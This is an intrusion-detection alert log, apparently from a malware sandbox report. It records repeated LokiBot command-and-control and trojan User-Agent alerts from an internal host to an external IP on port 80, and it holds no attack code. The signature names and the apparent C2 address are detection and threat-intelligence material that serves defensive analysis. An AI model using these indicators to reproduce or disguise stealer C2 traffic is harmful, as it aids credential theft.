2025-02-24T08:40:52.068550+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:53.012909+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:54.257394+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:55.234327+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:56.182541+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:57.247751+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:59.174518+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:41:00.308231+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:01.267591+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:02.224843+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:03.173833+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:04.134837+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:05.094385+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:06.079662+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.987400+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:08.013690+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:09.006286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.984363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.958410+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:11.868340+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.700663+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:13.521427+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:14.443762+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:15.373149+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:16.331658+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:17.131972+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:18.077139+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.888522+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:19.815156+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:20.748214+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:21.652618+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:22.563585+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:23.386428+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:24.355116+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:25.314763+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:26.615613+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:27.520016+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:28.327484+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:29.373821+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:30.197795+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:32.152769+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:33.144353+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:34.038924+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:35.970879+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.897407+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:37.718607+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:38.619361+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:39.547633+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:40.513919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:41.487519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:42.278552+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:43.104212+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:44.240152+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:45.264304+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:46.178511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:47.007432+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.948817+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.846181+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.801836+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:50.748237+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:51.688100+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:52.592576+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:53.535604+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:54.532759+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:55.486227+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:56.322837+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:57.309104+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:58.274736+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:59.223148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:42:00.168521+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.965681+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:01.899517+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.703391+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:03.709674+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:04.678316+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:05.629714+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:06.577278+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:07.386260+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:08.184382+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.985730+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:09.808134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:10.648907+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:11.474042+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:12.422371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:13.231254+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:14.158432+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:15.116374+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.914469+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:16.704731+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:17.694143+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50130	104.21.48.1	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:19.532963+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:20.447785+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:21.324303+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:22.245346+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:23.122370+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:24.055329+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:25.002119+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.918929+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:26.880323+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:27.805450+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:28.694033+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:29.628482+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:30.607398+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:31.518250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:32.430174+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:33.347667+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:34.228413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:35.152572+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.962938+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:36.837053+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:37.739015+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:38.704503+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:39.868013+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:41.836574+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:42.803843+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:43.783480+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:44.708677+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:45.615534+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:46.552124+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:47.489934+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:48.380589+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:49.167883+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:50.053008+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.996344+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:52.068550+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:53.012909+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:54.257394+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:55.234327+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:56.182541+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:57.247751+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:59.174518+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:41:00.308231+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:01.267591+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:02.224843+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:03.173833+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:04.134837+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:05.094385+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:06.079662+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.987400+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:08.013690+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:09.006286+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.984363+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.958410+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:11.868340+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.700663+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:13.521427+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:14.443762+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:15.373149+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:16.331658+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:17.131972+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:18.077139+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.888522+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:19.815156+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:20.748214+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:21.652618+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:22.563585+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:23.386428+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:24.355116+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:25.314763+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:26.615613+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:27.520016+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:28.327484+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:29.373821+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:30.197795+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:32.152769+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:33.144353+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:34.038924+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:35.970879+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.897407+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:37.718607+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:38.619361+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:39.547633+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:40.513919+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:41.487519+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:42.278552+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:43.104212+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:44.240152+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:45.264304+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:46.178511+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:47.007432+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.948817+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.846181+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.801836+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:50.748237+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:51.688100+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:52.592576+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:53.535604+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:54.532759+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:55.486227+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:56.322837+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:57.309104+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:58.274736+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:59.223148+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:42:00.168521+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.965681+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:01.899517+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.703391+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:03.709674+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:04.678316+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:05.629714+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:06.577278+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:07.386260+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:08.184382+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.985730+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:09.808134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:10.648907+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:11.474042+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:12.422371+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:13.231254+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:14.158432+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:15.116374+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.914469+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:16.704731+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:17.694143+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50130	104.21.48.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:16.802412+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.599802+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:22.404608+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.289335+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.218133+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.164608+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:26.089207+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:27.042767+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.817332+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49746	104.21.48.1	80	TCP
